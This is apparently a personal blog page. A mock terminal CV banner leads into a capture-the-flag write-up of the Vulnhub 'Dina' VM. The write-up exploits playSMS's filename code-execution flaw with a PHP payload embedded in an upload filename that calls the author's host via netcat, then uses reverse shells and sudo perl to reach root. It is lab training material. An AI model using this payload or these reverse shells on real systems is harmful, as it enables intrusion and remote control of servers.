$ ./rce.sh
[+] Checking credentials: Anders Kusk
[+] OSCP Cert loaded
[+] OSCE Cert loaded
[+] Parsing cv.bin
0x00002007: 4461 6e69 7368 2050 6f6c 6963 652c 204f 6666 6963 6572 2020 2020 2020 2020 200a Danish Police, Officer .
0x00002018: 5444 432c 2049 6e74 6572 6e61 6c20 5065 6e74 6573 7465 7220 2020 2020 2020 200a TDC, Internal Pentester .
0x00002019: 496d 7072 6f73 6563 2c20 5365 6375 7269 7479 2041 6476 6973 6f72 2020 2020 200a Improsec, Security Advisor .
[=] Loading externals
-> mutt -s "Hello" a@rce.sh < /dev/null
-> curl -v https://www.linkedin.com/in/anders-kusk
-> curl -v https://github.com/kusk/
-> curl -v https://twitter.com/anderskusk
^C
$ echo return to root
$ cat ./ctf/Vulnhub.com – Dina.md

Vulnhub.com – Dina

> 21/11/17

Created by Touhid Shaikh

Software used: nmap, dirbuster, netcat

A beginner CTF VM from vulnhub. Easy and quick to do.

First a look at the box with nmap. Only a HTTP-server open.

Visiting the website didn’t give anything useful. Running dirbuster against the server gave a few interesting files and directories.

The /nothing/pass was a text file with what looked like passwords.

After downloading the backup.zip file and opening it, I found that it was password protected. The password “freedom” from the pass file opened the zip file and extracted “backup-cred.mp3”. This file was also a text file and contained a username and a URL.

Visiting the URL showed, that it was hosting something called playSMS. Using the username “touhid” and the password “diana” from the file pass I was able to login.

Searching on exploit-db for playSMS showed that there was an exploit in the file upload function.

Unrestricted File Upload:

Any registered user can upload any file because of not proper Validation of file in sendfromfile.php

Code Execution using $filename

Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily but not store in any folder so our shell is useless. But if User change the file name to “mybackdoor.php” to “.php” den server check for file and set some perameter $filename=”.php” , U can see code below and display $filename on page.

When uploading a file playSMS will display the filename of the uploaded file on the webpage. So by uploading a file where the filename contains PHP-code, the PHP-code will be executed serverside. The problems is, that a filename can’t contain a lot of useful characters, fx. forward slash. So we will not be able to do much directory traversal other than to a parent directory. Sooo what to do?

Well at least I can take a look in the parent directory. I uploaded a file with the filename: “a.png” which listed all files recursively from the parent directory including their permissions. That way I could see which folders I could write to. It looks like “tmp” and “uploads” has the right permission for everybody to upload.

Next up I created a small script that would download a reverse shell from my workstation and execute it. I then configured netcat to send the script to anybody who would connect.

A quick python HTTP-server to serve the reverse-shell.

I then created a file called: “a<?php system(“nc 192.168.1.38 4444 sh”); ?>.png” which when uploaded, would connect to my netcat session on port 4444, receive the script and execute it with a shell.

Since the script would download and execute the perl script which would connect to my workstation at port 4445, I needed to confgure a netcat session on that port. After uploading the file, playSMS ran netcat which downloaded my script and executed it. The script downloaded my reverse-shell and executed it, and the reverse-shell connected to my other netcat session and gave me a reverse shell.

I was now inside as the www-data user. A quick test showed, that the www-data user had permission to run perl with sudo. Easy stuff.

So I wgetted a new reverse-shell, this time configured to connect to another netcat session on port 4446. I ran the reverse-shell with sudo and got a new reverse-shell, this time with root rights. I now had the root flag! Easy.